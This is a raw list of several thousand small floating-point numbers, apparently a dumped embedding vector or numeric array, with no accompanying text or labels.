0.010057264007627964, 0.008112816140055656, -0.009439770132303238, 0.02759014256298542, 0.02215094305574894, 0.015949729830026627, 0.016514671966433525, -0.0019723668228834867, 0.0016710101626813412, -0.014294321648776531, -0.019037198275327682, -0.010655050165951252, -0.009413493797183037, 0.001065833494067192, -0.005925311706960201, 0.006372008938342333, 0.00610596127808094, -0.013965867459774017, 0.011870330199599266, 0.005554158706218004, -0.0024666900280863047, 0.00016710101044736803, 0.016724882647395134, 0.016514671966433525, 0.015371651388704777, -0.005475329700857401, 0.004145090468227863, 0.005337378941476345, 0.011410494334995747, -0.0006725097191520035, 0.022098390385508537, 0.010628773830831051, -0.01860363967716694, -0.008677756413817406, -0.015608137473464012, 0.022755298763513565, 0.01912916637957096, -0.00925583578646183, -0.015148302540183067, -0.0020889679435640574, -0.012461547739803791, 0.004164797719568014, -0.014806710183620453, 0.0009484111797064543, -0.0013959298375993967, -0.0002777489717118442, 0.003317386144772172, 0.011351373046636581, 0.017105888575315475, -0.01497750636190176, -0.0017720097675919533, -0.028614919632673264, -0.0013844339409843087, 0.0019345944747328758, 0.008907674811780453, -0.012678327038884163, -0.022939233109354973, 0.015397926792502403, 0.002419064287096262, 0.008861690759658813, 0.013755656778812408, -0.0036885393783450127, -0.0085463747382164, 0.004375008400529623, 0.009544875472784042, -0.004979363642632961, 0.011719241738319397, 0.0004758478607982397, 0.019024061039090157, 0.003898749826475978, 0.0014074257342144847, -0.004792144987732172, 0.0028181360103189945, 0.011857192032039165, -0.0033732233569025993, -0.006017278879880905, 0.01924740895628929, 0.00900621060281992, 0.0016044981312006712, -0.017053335905075073, 0.009406925179064274, -0.004092537797987461, 0.019943730905652046, 0.013952729292213917, 0.002859192667528987, -0.011279112659394741, 0.007725239731371403, 0.012927952222526073, 0.003668832127004862, 0.01018864568322897, 0.0008047124720178545, -0.004910388495773077, 0.014451979659497738, 0.00238457671366632, 0.004930095747113228, 0.033370934426784515, -0.016843125224113464, 0.009111315943300724, 0.021402068436145782, 0.003274687100201845, 0.009873329661786556, 0.012205353938043118, -0.007994572632014751, 0.0038856116589158773, 0.00014010618906468153, 0.0009065332706086338, -0.0029856476467102766, -0.020075112581253052, 0.03229360654950142, 0.0027409493923187256, -0.024909958243370056, -0.0085463747382164, 0.0008268831297755241, 0.008631773293018341, 0.002414137590676546, -0.023228272795677185, -0.0018064974574372172, 0.000930346199311316, -0.030717026442289352, 0.006923811975866556, -0.01865619234740734, -0.026105530560016632, -0.012060834094882011, 0.0042436267249286175, 0.021388929337263107, -0.017171578481793404, 0.008158799260854721, -0.005652694497257471, -0.02602670155465603, -0.004710031673312187, -0.0065132444724440575, -0.003366654273122549, 0.010254336521029472, -0.010096678510308266, 0.009433201514184475, 0.003626133082434535, -0.0117849325761199, 0.003121956018730998, 0.008763154968619347, 0.034527093172073364, -0.008664618246257305, 0.0052684033289551735, -0.01474101934581995, -0.002151374239474535, -0.004217350389808416, -0.001803212915547192, 0.01936565339565277, 0.003041484858840704, -0.012993643060326576, 0.0076661184430122375, 0.027195997536182404, -0.013407495804131031, -0.038100674748420715, 0.0024666900280863047, 0.003220492275431752, -0.021283823996782303, -0.0007279363344423473, -0.003898749826475978, -0.007561013102531433, 0.0318206325173378, -0.031032340601086617, 0.008566082455217838, -0.014583361335098743, 0.006917242892086506, 0.027301102876663208, -0.01652780920267105, 0.0177102442830801, -0.01671174354851246, 0.018406566232442856, -0.01853794790804386, -0.005481898784637451, 0.007173437159508467, -0.002586575923487544, 0.01021492201834917, -0.015371651388704777, -0.010595928877592087, -0.01723727025091648, -0.003026704303920269, -0.002517600543797016, 0.03321327641606331, -0.0026686894707381725, -0.011850623413920403, 0.014649052172899246, 0.008401854895055294, 0.019825488328933716, -0.004903819411993027, 0.01576579548418522, 0.006644626148045063, -0.014543946832418442, 0.018945232033729553, -0.0010863618226721883, 0.0009656549664214253, 0.0075938585214316845, 0.02155972644686699, 0.014333736151456833, -0.004696893505752087, -0.007567582186311483, 0.011863761581480503, 0.023556726053357124, -0.031268827617168427, 0.015305960550904274, 0.032398711889982224, 0.0013827916700392962, -0.014583361335098743, -0.0000243646209128201, -0.006053408607840538, -0.0026686894707381725, -0.031505316495895386, -0.00860549695789814, 0.011463047005236149, -0.017040196806192398, -0.032214775681495667, -0.015608137473464012, -0.003934879787266254, -0.007449338678270578, 0.00900621060281992, -0.016921954229474068, -0.003144947811961174, -0.026355154812335968, 0.002873973222449422, 0.001583969802595675, 0.0014591572107747197, -0.01308561023324728, 0.025120168924331665, -0.005389931611716747, 0.010037556290626526, 0.007850052788853645, 0.0012161012273281813, -0.023753799498081207, -0.006427846383303404, 0.006910673808306456, 0.007869759574532509, 0.021980147808790207, 0.02678871527314186, -0.020745160058140755, -0.0002906818699557334, 0.003511174116283655, -0.0062143513932824135, 0.007935450412333012, 0.002499535446986556, -0.0009968581143766642, 0.01995687000453472, -0.00971567165106535, 0.019641553983092308, -0.004949802998453379, -0.009807638823986053, -0.0011052479967474937, 0.008743447251617908, 0.024003423750400543, 0.005826775450259447, 0.003409353317692876, 0.030585644766688347, 0.006638057064265013, -0.011206853203475475, 0.008736878633499146, -0.004512959159910679, -0.018406566232442856, 0.008388716727495193, 0.004122098907828331, -0.020837126299738884, -0.03915172442793846, -0.014596499502658844, -0.006375293713063002, 0.021362653002142906, 0.02761641889810562, 0.02433187887072563, 0.013624275103211403, -0.000020130642951698974, -0.02664419449865818, 0.020009422674775124, -0.01815694198012352, -0.0032057117205113173, -0.013992143794894218, 0.03586718440055847, -0.00001787252040230669, -0.01841970533132553, -0.005186290014535189, 0.002813209081068635, 0.00521913543343544, -0.0035374504514038563, 0.009334664791822433, -0.03473730385303497, 0.018879540264606476, -0.009387217462062836, 0.009222990833222866, -0.00907847099006176, -0.001960870809853077, 0.005002355668693781, -0.01252066995948553, 0.004092537797987461, -0.0066019268706440926, 0.006963226478546858, -0.01759199984371662, 0.008697464130818844, 0.005242126993834972, 0.008789431303739548, 0.023044338449835777, -0.01379507128149271, 0.008158799260854721, 0.021638555452227592, -0.020442981272935867, 0.0020676185376942158, -0.0015486610354855657, -0.004923526663333178, -0.009840483777225018, 0.02879885397851467, -0.014701604843139648, -0.014938091859221458, -0.007830345071852207, 0.016330737620592117, -0.01249439362436533, -0.000539896369446069, 0.0003144947695545852, 0.023346515372395515, 0.0016398070147261024, -0.020797712728381157, 0.0074756150133907795, 0.03468475118279457, 0.0021234555169939995, -0.009163868613541126, -0.002113601891323924, 0.0016430915566161275, -0.012993643060326576, 0.0012078898726031184, -0.0017112457426264882, -0.0017375220777466893, 0.008927381597459316, -0.005557443015277386, 0.0011077113449573517, -0.016869401559233665, 0.009886467829346657, 0.010122954845428467, -0.013755656778812408, 0.0017670829547569156, -0.03297679126262665, -0.00838214810937643, 0.008467545732855797, 0.013716242276132107, 0.01789417862892151, -0.0016274899244308472, -0.004949802998453379, 0.011627274565398693, -0.015581861138343811, -0.016724882647395134, 0.012730879709124565, -0.03481613099575043, -0.00589246628805995, -0.013387788087129593, -0.0014156370889395475, -0.0023780076298862696, 0.028010563924908638, 0.032162223011255264, -0.016606638208031654, 0.018708745017647743, 0.0021448051556944847, 0.009899605996906757, -0.025685109198093414, -0.0038034983444958925, -0.013913314789533615, 0.010963797569274902, 0.0001226570748258382, -0.010517099872231483, -0.010773293673992157, 0.0001099294750019908, -0.003455336904153228, -0.016107387840747833, -0.023057475686073303, -0.01576579548418522, -0.004457121714949608, 0.005997571628540754, -0.025869043543934822, -0.026631057262420654, 0.0230049230158329, -0.004407853819429874, -0.012041126377880573, 0.012947659939527512, 0.008040555752813816, 0.010799570009112358, -0.021099889650940895, -0.01082584634423256, 0.0036327021662145853, 0.0024207066744565964, -0.02241370640695095, 0.0007147981668822467, 0.009787931106984615, -0.008224490098655224, 0.014346874319016933, 0.027301102876663208, -0.01673801988363266, 0.006069831550121307, -0.03237243369221687, -0.009886467829346657, 0.010070402175188065, 0.0025093890726566315, 0.002194073284044862, 0.02383262850344181, -0.03576207906007767, -0.011423632502555847, -0.023438483476638794, -0.014675328508019447, 0.005721670109778643, 0.004595072474330664, 0.005245411768555641, -0.01224476844072342, -0.008750016801059246, 0.01018864568322897, 0.025619417428970337, -0.004312601871788502, -0.009525168687105179, -0.009111315943300724, -0.010122954845428467, -0.022794712334871292, 0.018406566232442856, 0.006500106304883957, -0.0009319884702563286, -0.024673471227288246, -0.017933592200279236, -0.005153444595634937, -0.029324380680918694, 0.001341734896413982, 0.0017358798068016768, -0.02879885397851467, -0.017723381519317627, -0.0027721524238586426, 0.002709746127948165, -0.010339734144508839, 0.028168221935629845, 0.02241370640695095, -0.0019132450688630342, 0.0012900034198537469, -0.0085463747382164, 0.016580361872911453, 0.020206494256854057, 0.012218492105603218, 0.00040933588752523065, 0.006759584881365299, 0.033160723745822906, -0.002629274968057871, 0.01759199984371662, 0.020075112581253052, -0.013295820914208889, -0.013939591124653816, 0.023267686367034912, 0.014307459816336632, 0.01718471758067608, -0.004000570625066757, -0.0027902175206691027, 0.02617122046649456, -0.006496821530163288, -0.0015716528287157416, -0.025855904445052147, -0.01333523541688919, 0.009058763273060322, 0.01647525653243065, 0.01759199984371662, 0.008342733606696129, 0.01780221052467823, -0.008520098403096199, -0.011857192032039165, 0.002686754334717989, -0.011627274565398693, 0.0016274899244308472, -0.010398856364190578, -0.012947659939527512, -0.0004078989150002599, 0.007028917316347361, 0.01157472189515829, -0.03725983202457428, 0.00517643615603447, 0.003576864954084158, -0.01640956662595272, -0.026565365493297577, -0.00040851475205272436, -0.0037772220093756914, -0.002376365242525935, 0.0062866113148629665, -0.02437129244208336, -0.0023812921717762947, -0.009163868613541126, -0.00517643615603447, 0.010569652542471886, -0.0013359870063140988, 0.003921741619706154, 0.009971865452826023, 0.011870330199599266, -0.008283612318336964, 0.005705247167497873, -0.015989145264029503, -0.003626133082434535, -0.010799570009112358, -0.0037739374674856663, 0.022492535412311554, -0.038836412131786346, -0.008395286276936531, -0.0038626198656857014, 0.011515599675476551, -0.003455336904153228, 0.0025307387113571167, -0.019891178235411644, -0.017933592200279236, -0.02879885397851467, 0.0016168152214959264, -0.007304818835109472, -0.02392459474503994, -0.015976006165146828, 0.009098177775740623, -0.009111315943300724, -0.008428131230175495, 0.0159365925937891, -0.00450310530140996, -0.023556726053357124, -0.017263546586036682, -0.0024568364024162292, -0.004493251908570528, 0.004082684405148029, -0.034579645842313766, -0.02019335702061653, -0.015660690143704414, -0.017316099256277084, -0.0024847551248967648, 0.004801998846232891, 0.027695247903466225, -0.0061585139483213425, 0.01556872297078371, -0.007744946982711554, 0.0038330592215061188, 0.001037093810737133, 0.011384217999875546, 0.003764083841815591, -0.016251908615231514, 0.007836914621293545, 0.007948588579893112, -0.037811633199453354, -0.015634413808584213, -0.00953830685466528, -0.014438841491937637, -0.008441269397735596, -0.025330377742648125, -0.014333736151456833, -0.007331095170229673, 0.021454621106386185, -0.0032533376943320036, 0.0066479104571044445, 0.013138162903487682, 0.02874630130827427, -0.012468117289245129, -0.01910289004445076, 0.02161227911710739, 0.004933380056172609, -0.010011279955506325, 0.01449139416217804, 0.004664048086851835, -0.008690894581377506, 0.003793644718825817, 0.013203853741288185, 0.007028917316347361, -0.02212466672062874, -0.019510172307491302, -0.0047166007570922375, -0.00015930022345855832, -0.032924238592386246, -0.007501891348510981, 0.0035473040770739317, 0.027038339525461197, 0.0019296676618978381, -0.007797499652951956, 0.0002849339216481894, 0.006417992524802685, -0.0005661727045662701, 0.0007866474916227162, 0.0033830769825726748, 0.01132509671151638, 0.015516170300543308, 0.00612895330414176, 0.0038232055958360434, -0.03557814657688141, 0.025264687836170197, 0.008277042768895626, 0.0068843974731862545, -0.011555014178156853, 0.002759014256298542, 0.010346303693950176, 0.014320597983896732, -0.0005164940375834703, 0.015292822383344173, -0.02380635216832161, -0.03063819743692875, 0.002056122524663806, -0.004877543076872826, 0.019260548055171967, 0.013847623951733112, -0.01132509671151638, 0.006523097865283489, -0.011285682208836079, -0.02259764075279236, 0.007633273024111986, -0.008835414424538612, 0.02560628019273281, -0.004489967133849859, -0.011003212071955204, -0.03019149973988533, -0.02782662957906723, 0.015174578875303268, 0.004522812552750111, 0.004276472143828869, -0.030795853585004807, -0.009426631964743137, 0.016343874856829643, 0.005807068198919296, 0.009755086153745651, -0.011226559989154339, 0.016961367800831795, -0.0023090322501957417, -0.010392286814749241, 0.004493251908570528, -0.0019657977391034365, 0.007922312244772911, 0.02735365554690361, 0.018459118902683258, -0.009163868613541126, -0.01037914864718914, 0.019943730905652046, 0.004499820992350578, -0.009190144948661327, -0.0020084967836737633, 0.009590859524905682, 0.006033701356500387, 0.0012908244971185923, 0.010004711337387562, -0.013387788087129593, 0.026328878477215767, 0.012566653080284595, -0.013860762119293213, -0.003928310703486204, 0.00748875318095088, 0.0026654049288481474, 0.012645482085645199, -0.006473829969763756, 0.01685626246035099, -0.0044965362176299095, 0.0039611561223864555, 0.002709746127948165, -0.013354943133890629, -0.010326595976948738, -0.004795429762452841, -0.009899605996906757, -0.010871830396354198, 0.0013745803153142333, -0.014162939973175526, 0.002568510826677084, -0.012067402713000774, 0.005265119019895792, -0.018524810671806335, 0.013236699625849724, -0.016435842961072922, 0.02501506358385086, -0.006943519227206707, -0.03376507759094238, -0.015148302540183067, 0.02061377838253975, -0.006283326540142298, 0.013571722432971, -0.03623505309224129, -0.01718471758067608, -0.020390428602695465, 0.006651195231825113, 0.02416108176112175, 0.011568152345716953, 0.007180006243288517, 0.03400156646966934, -0.014846124686300755, -0.013742518611252308, -0.010878399014472961, 0.003645840333774686, -0.005035201087594032, 0.005084468983113766, -0.017342375591397285, -0.019838625565171242, 0.001388539676554501, -0.004650909919291735, -0.015319098718464375, 0.004447268322110176, 0.0008605496841482818, -0.0412275567650795, 0.009085039608180523, 0.0007414850988425314, -0.0032796140294522047, -0.0072391279973089695, -0.00589246628805995, -0.015897177159786224, -0.0036556939594447613, 0.04953087493777275, -0.000709871354047209, 0.009354372508823872, 0.00788289774209261, 0.011233129538595676, -0.00047543729306198657, -0.01652780920267105, -0.010622205212712288, -0.010497392155230045, 0.023885181173682213, -0.015305960550904274, -0.000018898939742939547, -0.002773794811218977, -0.002461763331666589, -0.002511031460016966, 0.018945232033729553, 0.012500962242484093, 0.014635914005339146, -0.0009122812189161777, -0.0011873615439981222, -0.015043197199702263, -0.0027491606306284666, -0.006864690221846104, -0.004447268322110176, 0.006943519227206707, 0.012888537719845772, -0.00106829684227705, -0.003461905987933278, 0.0002481881238054484, -0.003928310703486204, 0.01123969815671444, 0.024686608463525772, -0.004128667991608381, -0.00656579714268446, -0.004792144987732172, 0.016159940510988235, 0.007140591740608215, -0.01113459374755621, 0.0014731165720149875, -0.012395856902003288, 0.02259764075279236, 0.008966796100139618, 0.004535950720310211, -0.01650153286755085, 0.0020840412471443415, -0.013584860600531101, -0.01682998612523079, 0.007587289437651634, 0.006713601294904947, 0.009111315943300724, -0.0071668680757284164, 0.0008654764969833195, 0.010175507515668869, 0.002545519033446908, -0.0073573715053498745, 0.005895750597119331, -0.004634486977010965, 0.0024272757582366467, 0.01379507128149271, 0.003003712510690093, -0.007180006243288517, -0.007147160824388266, -0.013847623951733112, -0.015187717042863369, 0.0011093536159023643, -0.017513170838356018, -0.00026748477830551565, -0.005330809857696295, -0.010109816677868366, -0.024121668189764023, 0.01123969815671444, 0.012816278263926506, 0.006917242892086506, -0.011765224859118462, -0.002660477999597788, 0.013013350777328014, 0.029797354713082314, 0.008585789240896702, 0.0022219917736947536, 0.017289822921156883, 0.014373150654137135, 0.02579021453857422, 0.0009623704245314002, -0.011482754722237587, -0.007988003082573414, -0.015831487253308296, 0.004634486977010965, 0.009354372508823872, 0.00794201996177435, 0.006831844802945852, 0.010490823537111282, 0.01792045496404171, 0.02425304986536503, -0.008342733606696129, -0.019116027280688286, -0.03439570963382721, -0.012238198891282082, 0.02146775834262371, 0.017171578481793404, -0.00541292317211628, -0.012606067582964897, 0.0117717944085598, -0.011509031057357788, -0.005754515528678894, -0.0044341301545500755, -0.011844053864479065, -0.01219878438860178, 0.01156158372759819, 0.015069473534822464, -0.021769937127828598, -0.004512959159910679, -0.004194358363747597, -0.008342733606696129, 0.0004177525406703353, 0.011752086691558361, 0.004798714071512222, 0.013663689605891705, -0.003438914194703102, 0.012126524932682514, 0.002678543096408248, -0.012973936274647713, -0.0035900031216442585, -0.010037556290626526, 0.0009106389479711652, -0.021625416353344917, -0.0007562655373476446, -0.014412565156817436, -0.014649052172899246, -0.009833915159106255, 0.011719241738319397, 0.0021497318521142006, 0.011870330199599266, 0.011942590586841106, 0.023819489404559135, 0.016304461285471916, 0.012592929415404797, -0.003967725206166506, 0.02596100978553295, 0.0008933951030485332, -0.020929094403982162, 0.0035144586581736803, -0.01172581035643816, -0.011390787549316883, -0.004388146568089724, -0.0013146374840289354, -0.0070026409812271595, -0.01682998612523079, 0.012323597446084023, -0.011384217999875546, 0.027879182249307632, -0.014373150654137135, 0.010681326501071453, -0.0026769007090479136, 0.016685467213392258, 0.009420063346624374, -0.008217921480536461, 0.017263546586036682, -0.002663762541487813, 0.011068902909755707, -0.02066633105278015, 0.013407495804131031, -0.025632556527853012, 0.005439199507236481, -0.008677756413817406, 0.012146231718361378, -0.012027988210320473, 0.015108888037502766, 0.04532666131854057, -0.007777792401611805, -0.02437129244208336, -0.03917800262570381, 0.01520085521042347, -0.008887967094779015, -0.0030431270133703947, 0.012776863761246204, -0.004000570625066757, -0.002977436175569892, 0.010385718196630478, 0.03108489327132702, 0.020929094403982162, -0.004634486977010965, 0.015082611702382565, -0.009939020499587059, -0.01132509671151638, 0.0011701176408678293, 0.00634244829416275, -0.02345162071287632, 0.0009024275932461023, -0.0024814705830067396, 0.011443340219557285, -0.010241198353469372, 0.009071901440620422, 0.00034220810630358756, -0.004033416043967009, -0.00011157174594700336, -0.011141162365674973, -0.0024634054861962795, 0.007692394312471151, 0.003934879787266254, 0.015594999305903912, 0.005728239193558693, -0.0038954652845859528, 0.0036097103729844093, 0.005373508669435978, 0.004013708792626858, -0.007081469986587763, 0.01252066995948553, -0.0067201703786849976, 0.004013708792626858, 0.009676257148385048, 0.00015539982996415347, 0.03873130679130554, 0.003003712510690093, -0.01747375726699829, -0.026039838790893555, -0.03255636990070343, 0.013289252296090126, 0.003458621446043253, -0.015831487253308296, -0.014202354475855827, 0.005807068198919296, -0.010747017338871956, 0.010017849504947662, 0.0025241696275770664, -0.01990431733429432, 0.0062767574563622475, 0.020456120371818542, 0.003225418971851468, -0.03308189660310745, -0.005715101025998592, 0.009886467829346657, 0.028115669265389442, 0.006447553634643555, -0.02085026539862156, 0.0010379148880019784, 0.010760155506432056, -0.001431238604709506, -0.0049136728048324585, -0.011436770670115948, 0.015844624489545822, -0.012172508053481579, -0.009222990833222866, -0.008066832087934017, -0.00545562244951725, -0.016698606312274933, 0.010733879171311855, -0.0027639411855489016, 0.0031695817597210407, 0.005616564769297838, -0.003317386144772172, 0.007462476845830679, 0.005071330815553665, 0.004112245049327612, 0.009794500656425953, 0.016567224636673927, -0.03213594853878021, -0.009958727285265923, 0.002056122524663806, 0.0022909671533852816, 0.00953830685466528, -0.01744748093187809, -0.027879182249307632, -0.0006261155940592289, 0.01108860969543457, 0.016396427527070045, 0.020561225712299347, 0.008408424444496632, -0.015371651388704777, -0.015660690143704414, -0.007587289437651634, 0.0025504459626972675, -0.009380648843944073, -0.012881969101727009, -0.008106246590614319, -0.025067616254091263, 0.0012259548529982567, -0.002514316001906991, 0.0017982861027121544, -0.016724882647395134, 0.008428131230175495, 0.010917813517153263, -0.021047336980700493, 0.0035177432000637054, -0.016987644135951996, -0.008086539804935455, 0.003409353317692876, -0.023320239037275314, -0.015187717042863369, 0.0025553726591169834, -0.009012780152261257, -0.014767295680940151, -0.0025438768789172173, -0.029823631048202515, -0.01154844556003809, -0.010576221160590649, -0.004943233914673328, -0.021257547661662102, 0.0027902175206691027, 0.020075112581253052, 0.02271588332951069, 0.018078112974762917, 0.016632914543151855, -0.009045625105500221, -0.001918171881698072, -0.010963797569274902, 0.016304461285471916, -0.03515772521495819, 0.01404469646513462, 0.018445981666445732, -0.018524810671806335, 0.0038888962008059025, -0.004489967133849859, 0.012546946294605732, 0.010063832625746727, -0.003668832127004862, 0.008414993062615395, -0.012730879709124565, 0.016448980197310448, -0.0053866468369960785, 0.015082611702382565, 0.0022614062763750553, -0.011627274565398693, 0.004903819411993027, 0.016488395631313324, -0.00283455871976912, 0.0025668686721473932, 0.023517312481999397, 0.008887967094779015, -0.003263191320002079, -0.0018442696891725063, 0.0026703316252678633, 0.004657479003071785, 0.021743660792708397, 0.013532307930290699, -0.014557084999978542, 0.029061617329716682, 0.010405424982309341, -0.010569652542471886, -0.004154944326728582, -0.013716242276132107, -0.015844624489545822, 0.021428344771265984, -0.010234628804028034, 0.013663689605891705, 0.007744946982711554, 0.0048348442651331425, -0.014070972800254822, 0.0031975004822015762, -0.013243268243968487, 0.009275543503463268, 0.0025208850856870413, -0.026039838790893555, -0.02025904692709446, -0.02472602389752865, -0.017079612240195274, -0.01841970533132553, -0.01227104477584362, -0.0001538602082291618, -0.0051600136794149876, 0.006818706635385752, 0.0014911815524101257, 0.005320955999195576, -0.004365154542028904, 0.014333736151456833, 0.008053693920373917, 0.0006532130646519363, 0.00861863512545824, 0.011121455579996109, -0.01640956662595272, 0.016987644135951996, 0.0005550874047912657, 0.0318206325173378, -0.002888753544539213, -0.012868830934166908, -0.013611136935651302, 0.008263904601335526, -0.002228560857474804, -0.0057577998377382755, -0.0029708670917898417, -0.01425490714609623, 0.021388929337263107, -0.001330238999798894, 0.011036057025194168, 0.005866189952939749, -0.0017621561419218779, -0.02548803575336933, 0.009012780152261257, 0.003018493065610528, 0.005636272020637989, 0.0014649052172899246, 0.0043060327880084515, -0.010648481547832489, 0.0017982861027121544, 0.002414137590676546, 0.023517312481999397, -0.005573865957558155, 0.011824347078800201, -0.005642841104418039, 0.0029560867697000504, -0.013703104108572006, -0.006871259305626154, -0.015253407880663872, 0.013742518611252308, -0.008316457271575928, 0.026578504592180252, -0.018997784703969955, -0.009899605996906757, -0.0015806852607056499, 0.015962868928909302, -0.02971852570772171, -0.014622775837779045, 0.027958011254668236, -0.013650551438331604, -0.007876329123973846, 0.0010806139325723052, 0.005895750597119331, 0.0023517312947660685, -0.013847623951733112, -0.005022062920033932, -0.005439199507236481, 0.006569081451743841, 0.004723169840872288, 0.008441269397735596, 0.010871830396354198, 0.028825130313634872, 0.021717384457588196, 0.00273109576664865, -0.00925583578646183, 0.005935165099799633, -0.009236129000782967, -0.009899605996906757, -0.022098390385508537, -0.001416458166204393, 0.01851167157292366, 0.0033863615244627, 0.003488182323053479, 0.004493251908570528, 0.00495308730751276, -0.02678871527314186, -0.006831844802945852, 0.0029166722670197487, -0.0019723668228834867, 0.020416704937815666, -0.01196229737251997, -0.01221192255616188, -0.010241198353469372, 0.023872042074799538, -0.018879540264606476, -0.014570223167538643, 0.00009838226105784997, 0.013900176621973515, 0.008296750485897064, -0.00700921006500721, 0.02247939631342888, 0.028614919632673264, 0.014872401021420956, 0.018551087006926537, -0.007843483239412308, -0.004338878206908703, 0.01999628357589245, 0.019168579950928688, 0.027485037222504616, 0.02856236696243286, 0.0022302032448351383, -0.013190715573728085, 0.014123525470495224, 0.0023402352817356586, -0.003389646066352725, 0.018445981666445732, 0.0006458228453993797, -0.011850623413920403, 0.012973936274647713, -0.0003906550700776279, 0.016317598521709442, -0.004174651578068733, 0.0011249552480876446, -0.020574362948536873, -0.018459118902683258, 0.02004883624613285, 0.021494034677743912, -0.01037914864718914, -0.014688466675579548, -0.013440340757369995, 0.01113459374755621, -0.002773794811218977, -0.014583361335098743, 0.01753944717347622, -0.02418735809624195, -0.006890966556966305, 0.014320597983896732, 0.006618349812924862, 0.0010379148880019784, -0.001811424270272255, -0.007153729908168316, -0.006726739462465048, 0.02900906465947628, 0.017053335905075073, -0.017289822921156883, -0.01133823487907648, 0.01403155829757452, -0.01907661370933056, -0.004972794558852911, 0.009847053326666355, 0.008861690759658813, -0.007830345071852207, -0.009518599137663841, -0.010668188333511353, 0.005074615590274334, 0.008986503817141056, -0.01333523541688919, 0.006237342953681946, -0.014688466675579548, -0.014176078140735626, -0.015529308468103409, -0.008033987134695053, -0.019917454570531845, 0.010313457809388638, 0.01581834815442562, 0.019260548055171967, -0.026959510520100594, -0.017854763194918633, 0.0004148785665165633, 0.011594428680837154, 0.02064005471765995, -0.007626703940331936, -0.014688466675579548, 0.01114773191511631, -0.030060118064284325, -0.013611136935651302, 0.0012218492338433862, 0.003852766240015626, 0.0024059261195361614, 0.023635555058717728, -0.0015593357384204865, 0.0024092106614261866, -0.014570223167538643, -0.01931310072541237, 0.017999283969402313, 0.0009656549664214253, 0.017789073288440704, -0.003291109809651971, -0.005064761731773615, -0.002732737921178341, 0.012500962242484093, 0.009722241200506687, -0.015844624489545822, 0.00248803966678679, 0.004864404909312725, 0.004811852239072323, -0.000308952119667083, -0.015345375053584576, 0.0029872898012399673, -0.021165581420063972, 0.023044338449835777, -0.000041287705244030803, -0.016987644135951996, -0.001609424944035709, -0.0009648338309489191, 0.015082611702382565, 0.004936664830893278, -0.0026719740126281977, 0.008079970255494118, -0.0038659044075757265, 0.004572080913931131, 0.004549088887870312, -0.024358155205845833, 0.017486894503235817, -0.004493251908570528, -0.0038954652845859528, -0.026473399251699448, -0.027905458584427834, -0.02016708068549633, -0.011495892889797688, -0.0028197781648486853, 0.014386288821697235, -0.01449139416217804, 0.0020610494539141655, -0.01379507128149271, -0.008815707638859749, 0.026723023504018784, 0.0014640840236097574, 0.0024847551248967648, 0.006546089891344309, -0.02194073237478733, -0.007147160824388266, 0.015581861138343811, 0.02525154873728752, 0.02803684026002884, -0.008040555752813816, 0.009196714498102665, -0.001014102017506957, -0.009853621944785118, 0.021520311012864113, -0.006710316985845566, -0.036865685135126114, 0.0036819702945649624, -0.025185858830809593, 0.0007102819508872926, 0.017224131152033806, 0.023372791707515717, 0.015989145264029503, 0.0016997498460114002, -0.004220634698867798, 0.0005288110696710646, 0.00903248693794012, 0.012192215770483017, 0.010471115820109844, 0.0015141733456403017, -0.0058037834241986275, -0.0003029989020433277, 0.010884968563914299, -0.006532951723784208, -0.02732737921178341, 0.04201584681868553, 0.02312316745519638, 0.017815349623560905, 0.024147944524884224, 0.012087110430002213, -0.004870973993092775, -0.0037148157134652138, -0.007935450412333012, 0.008526667952537537, 0.026565365493297577, 0.003810067428275943, -0.010950659401714802, -0.003534165909513831, 0.004581934306770563, -0.005964726209640503, 0.0022104959934949875, 0.0003212691517546773, -0.009787931106984615, -0.008664618246257305, -0.00029745622305199504, -0.00813252292573452, -0.008158799260854721, 0.01954958774149418, -0.006904104724526405, 0.008717170916497707, 0.02392459474503994, 0.01114773191511631, -0.006723455153405666, 0.005839913617819548, -0.011272544041275978, 0.02643398381769657, 0.003484897781163454, -0.013597998768091202, 0.01612052693963051, -0.00657893531024456, -0.008060263469815254, 0.007856621406972408, 0.012586359865963459, 0.011331665329635143, -0.004214065615087748, 0.0034060687758028507, -0.0007652980275452137, -0.03281913325190544, -0.008953657932579517, 0.02096850797533989, 0.003461905987933278, 0.015989145264029503, 0.018695605918765068, 0.01309874840080738, 0.036182500422000885, 0.015122026205062866, -0.006073115859180689, -0.005094322841614485, 0.0117717944085598, -0.008040555752813816, 0.015424203127622604, 0.0118112089112401, -0.012737449258565903, -0.0047330232337117195, -0.015003782697021961, -0.018997784703969955, -0.018853263929486275, -0.01652780920267105, -0.0006450017099268734, -0.0271171685308218, -0.01919485628604889, 0.00018947695207316428, 0.02874630130827427, -0.013532307930290699, 0.022242911159992218, 0.0011036057258024812, -0.006680755876004696, -0.009446339681744576, 0.01106233336031437, 0.006155229639261961, -0.0018212778959423304, -0.013663689605891705, -0.017408065497875214, -0.011968866921961308, 0.0001551945460960269, 0.0026769007090479136, 0.0041976431384682655, 0.012461547739803791, -0.009853621944785118, 0.003343662479892373, -0.00498921750113368, -0.0126717584207654, 0.004608210641890764, 0.004256764892488718, 0.03297679126262665, 0.019615277647972107, -0.0026769007090479136, -0.013223561458289623, -0.012087110430002213, 0.0014796856557950377, -0.018826987594366074, -0.003902034368366003, -0.00977479387074709, 0.013939591124653816, 0.018314599990844727, 0.008493822067975998, 0.002952802227810025, -0.011193715035915375, 0.010937521234154701, 0.012796570546925068, 0.005912173539400101, 0.016554085537791252, -0.00819164514541626, -0.00795515812933445, 0.012855692766606808, 0.002736022463068366, 0.000006027004019415472, -0.014714743010699749, -0.004283041227608919, 0.018708745017647743, 0.002640770748257637, -0.0117849325761199, -0.023911457508802414, 0.010254336521029472, -0.021769937127828598, -0.006726739462465048, -0.01250753179192543, 0.013000212609767914, 0.017342375591397285, 0.023399068042635918, -0.025737661868333817, 0.016330737620592117, 0.03373880311846733, 0.015437341295182705, 0.005564012099057436, 0.0025093890726566315, -0.007081469986587763, 0.020101388916373253, 0.0016061404021456838, 0.013105317950248718, 0.01564755290746689, -0.02850981429219246, 0.007600427605211735, 0.012744017876684666, 0.002410853048786521, -0.001633237930946052, 0.05278914049267769, -0.02649967558681965, 0.0014591572107747197, -0.015069473534822464, -0.006421277299523354, -0.007692394312471151, 0.0057577998377382755, -0.0018918955465778708, -0.030822129920125008, 0.0038593353237956762, -0.002369796158745885, 0.0037148157134652138, 0.0063358792103827, -0.0022630486637353897, 0.005925311706960201, 0.0071668680757284164, 0.011896606534719467, 0.0028871113900095224, 0.011154300533235073, -0.0055771502666175365, 0.010471115820109844, 0.0010354515397921205, 0.017552586272358894, 0.0014607994817197323, 0.014662190340459347, 0.00427975645288825, -0.014885539188981056, 0.00589246628805995, -0.013479755260050297, 